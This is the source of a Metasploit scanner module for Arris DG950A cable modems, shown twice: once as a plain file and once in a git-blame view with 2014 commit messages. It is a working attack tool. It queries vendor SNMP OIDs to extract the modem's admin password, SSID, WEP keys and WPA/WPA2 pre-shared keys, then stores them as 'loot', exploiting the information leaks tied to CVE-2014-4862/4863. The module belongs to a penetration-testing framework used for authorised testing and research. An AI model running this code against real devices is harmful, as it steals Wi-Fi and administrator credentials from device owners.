metasploit-framework/modules/auxiliary/scanner/snmp/arris_dg950.rb

#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::SNMPClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Arris DG950A Cable Modem Wifi Enumeration',
      'Description' => %q{
        This module will extract WEP keys and WPA preshared keys from
        Arris DG950A cable modems.
      },
      'References'  =>
        [
          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863']
        ],
      'Author'      => ['Deral "Percent_X" Heiland'],
      'License'     => MSF_LICENSE
    )
  end

  def run_host(ip)
    snmp = connect_snmp

    if snmp.get_value('sysDescr.0') =~ /DG950A/
      print_line("#{ip}")

      # System Admin Password
      wifi_info = ''
      password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')
      print_line("Password: #{password}")
      wifi_info << "Password: #{password}" << "\n"
    else
      fail_with("Does not appear to be an Arris DG950A")
    end

    # check WPA Encryption Algorithm
    encrypt_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.1.12')
    case encrypt_type
    when 1
      wpa_encrypt = "TKIP"
    when 2
      wpa_encrypt = "AES"
    when 3
      wpa_encrypt = "TKIP/AES"
    else
      wpa_encrypt = "Unknown"
    end

    # Wifi Status
    wifi_status = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12')
    if wifi_status == '1'
      ssid = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.2.12')
      print_line("SSID: #{ssid}")
      wifi_info << "SSID: #{ssid}" << "\n"

      # Wifi Security Settings
      wifi_version = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.5.12')
      if wifi_version == '0'
        print_line('Open Access Wifi is Enabled')
        wifi_info << 'Open Access WIFI is Enabled' << '\n'

      # Wep enabled
      elsif wifi_version == '1'
        wep_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.23.1.2.12')
        case wep_type
        when 1
          oid = "1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12"
        when 2
          oid = "1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12"
        else
          print_line('FAILED')
        end
        wepkey1 = snmp.get_value("#{oid}.1")
        key1 = "#{wepkey1}"
        print_line("WEP KEY1: #{key1}")
        wifi_info << "WEP KEY1: #{key1}" << "\n"
        wepkey2 = snmp.get_value("#{oid}.2")
        key2 = "#{wepkey2}"
        print_line("WEP KEY2: #{key2}")
        wifi_info << "WEP KEY2: #{key2}" << "\n"
        wepkey3 = snmp.get_value("#{oid}.3")
        key3 = "#{wepkey3}"
        print_line("WEP KEY3: #{key3}")
        wifi_info << "WEP KEY3: #{key3}" << "\n"
        wepkey4 = snmp.get_value("#{oid}.4")
        key4 = "#{wepkey4}"
        print_line("WEP KEY4: #{key4}")
        wifi_info << "WEP KEY4: #{key4}" << "\n"

      # WPA enabled
      elsif wifi_version == '2'
        wpapsk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
        print_line("WPA PSK: #{wpapsk}")
        print_line("WPA Encryption: #{wpa_encrypt}")
        wifi_info << "WPA PSK: #{wpapsk}" << "\n"
        wifi_info << "WPA Encryption #{wpa_encrypt}" << "\n"

      # WPA2 enabled
      elsif wifi_version == '3'
        wpapsk2 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
        print_line("WPA2 PSK: #{wpapsk2}")
        print_line("WPA2 Encryption: #{wpa_encrypt}")
        wifi_info << "WPA2 PSK: #{wpapsk2}" << "\n"
        wifi_info << "WPA2 Encryption: #{wpa_encrypt}" << "\n"

      # WPA/WPA2 enabled
      elsif wifi_version == '7'
        wpawpa2psk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
        print_line("WPA/WPA2 PSK: #{wpawpa2psk}")
        print_line("WPA/WPA2 Encryption: #{wpa_encrypt}")
        wifi_info << "WPA/WPA2 PSK: #{wpawpa2psk}" << "\n"
        wifi_info << "WPA/WPA2 Encryption: #{wpa_encrypt}" << "\n"

      else
        print_line('FAILED')
      end
    else
      print_line('WIFI is not enabled')
    end

    # Woot we got loot.
    loot_name     = 'arris_wifi'
    loot_type     = 'text/plain'
    loot_filename = 'arris_wifi.text'
    loot_desc     = 'Arris DG950A Wifi configuration data'
    p = store_loot(loot_name, loot_type, datastore['RHOST'], wifi_info, loot_filename, loot_desc)
    print_status("WIFI Data saved in: #{p}")
  # No need to make noise
  rescue ::SNMP::UnsupportedVersion
  rescue ::SNMP::RequestTimeout
    raise $ERROR_INFO
  rescue ::Exception => e
    print_error("#{ip} error: #{e.class} #{e.message}")
    disconnect_snmp
  end
end
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00			`#`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`
			`include Msf::Exploit::Remote::SNMPClient`
			`include Msf::Auxiliary::Report`
			`include Msf::Auxiliary::Scanner`

			`def initialize`
			`super(`
			`'Name' => 'Arris DG950A Cable Modem Wifi Enumeration',`
			`'Description' => %q{`
			`This module will extract WEP keys and WPA preshared keys from`
			`Arris DG950A cable modems.`
			`},`
			`'References' =>`
			`[`
			`['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863']`
			`],`
			`'Author' => ['Deral "Percent_X" Heiland'],`
			`'License' => MSF_LICENSE`
			`)`
			`end`

			`def run_host(ip)`
			`snmp = connect_snmp`

			`if snmp.get_value('sysDescr.0') =~ /DG950A/`
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00			`print_line("#{ip}")`
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00
			`# System Admin Password`
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00			`wifi_info = ''`
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00			`password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')`
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00			`print_line("Password: #{password}")`
			`wifi_info << "Password: #{password}" << "\n"`
			`else`
			`fail_with("Does not appear to be an Arris DG950A")`
			`end`
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00			`# check WPA Encryption Algorithm`
			`encrypt_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.1.12')`
			`case encrypt_type`
			`when 1`
			`wpa_encrypt = "TKIP"`
			`when 2`
			`wpa_encrypt = "AES"`
			`when 3`
			`wpa_encrypt = "TKIP/AES"`
			`else`
			`wpa_encrypt = "Unknown"`
			`end`
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00			`# Wifi Status`
			`wifi_status = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12')`
			`if wifi_status == '1'`
			`ssid = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.2.12')`
			`print_line("SSID: #{ssid}")`
			`wifi_info << "SSID: #{ssid}" << "\n"`

			`# Wifi Security Settings`
			`wifi_version = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.5.12')`
			`if wifi_version == '0'`
			`print_line('Open Access Wifi is Enabled')`
			`wifi_info << 'Open Access WIFI is Enabled' << '\n'`

			`# Wep enabled`
			`elsif wifi_version == '1'`
			`wep_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.23.1.2.12')`
			`case wep_type`
			`when 1`
			`oid = "1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12"`
			`when 2`
			`oid = "1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12"`
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00			`else`
			`print_line('FAILED')`
			`end`
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00			`wepkey1 = snmp.get_value("#{oid}.1")`
			`key1 = "#{wepkey1}"`
			`print_line("WEP KEY1: #{key1}")`
			`wifi_info << "WEP KEY1: #{key1}" << "\n"`
			`wepkey2 = snmp.get_value("#{oid}.2")`
			`key2 = "#{wepkey2}"`
			`print_line("WEP KEY2: #{key2}")`
			`wifi_info << "WEP KEY2: #{key2}" << "\n"`
			`wepkey3 = snmp.get_value("#{oid}.3")`
			`key3 = "#{wepkey3}"`
			`print_line("WEP KEY3: #{key3}")`
			`wifi_info << "WEP KEY3: #{key3}" << "\n"`
			`wepkey4 = snmp.get_value("#{oid}.4")`
			`key4 = "#{wepkey4}"`
			`print_line("WEP KEY4: #{key4}")`
			`wifi_info << "WEP KEY4: #{key4}" << "\n"`

			`# WPA enabled`
			`elsif wifi_version == '2'`
			`wpapsk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')`
			`print_line("WPA PSK: #{wpapsk}")`
			`print_line("WPA Encryption: #{wpa_encrypt}")`
			`wifi_info << "WPA PSK: #{wpapsk}" << "\n"`
			`wifi_info << "WPA Encryption #{wpa_encrypt}" << "\n"`

			`# WPA2 enabled`
			`elsif wifi_version == '3'`
			`wpapsk2 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')`
			`print_line("WPA2 PSK: #{wpapsk2}")`
			`print_line("WPA2 Encryption: #{wpa_encrypt}")`
			`wifi_info << "WPA2 PSK: #{wpapsk2}" << "\n"`
			`wifi_info << "WPA2 Encryption: #{wpa_encrypt}" << "\n"`

			`# WPA/WPA2 enabled`
			`elsif wifi_version == '7'`
			`wpawpa2psk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')`
			`print_line("WPA/WPA2 PSK: #{wpawpa2psk}")`
			`print_line("WPA/WPA2 Encryption: #{wpa_encrypt}")`
			`wifi_info << "WPA/WPA2 PSK: #{wpawpa2psk}" << "\n"`
			`wifi_info << "WPA/WPA2 Encryption: #{wpa_encrypt}" << "\n"`

Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00			`else`
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00			`print_line('FAILED')`
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00			`end`
			`else`
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00			`print_line('WIFI is not enabled')`
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00			`end`
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00			`# Woot we got loot.`
			`loot_name = 'arris_wifi'`
			`loot_type = 'text/plain'`
			`loot_filename = 'arris_wifi.text'`
			`loot_desc = 'Arris DG950A Wifi configuration data'`
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00			`p = store_loot(loot_name, loot_type, datastore['RHOST'], wifi_info, loot_filename, loot_desc)`
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00			`print_status("WIFI Data saved in: #{p}")`
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00			`# No need to make noise`
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00			`rescue ::SNMP::UnsupportedVersion`
			`rescue ::SNMP::RequestTimeout`
			`raise $ERROR_INFO`
			`rescue ::Exception => e`
Update arris_dg950 module with required changes Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readable 2014-09-10 23:07:53 +00:00			`print_error("#{ip} error: #{e.class} #{e.message}")`
Add Arris DG950A SNMP data extraction module This module will extract critical data such as WPA and WEP keys from the Arris DG950a model cable modem via the SNMP protocal. 2014-09-08 15:04:31 +00:00			`disconnect_snmp`
			`end`
			`end`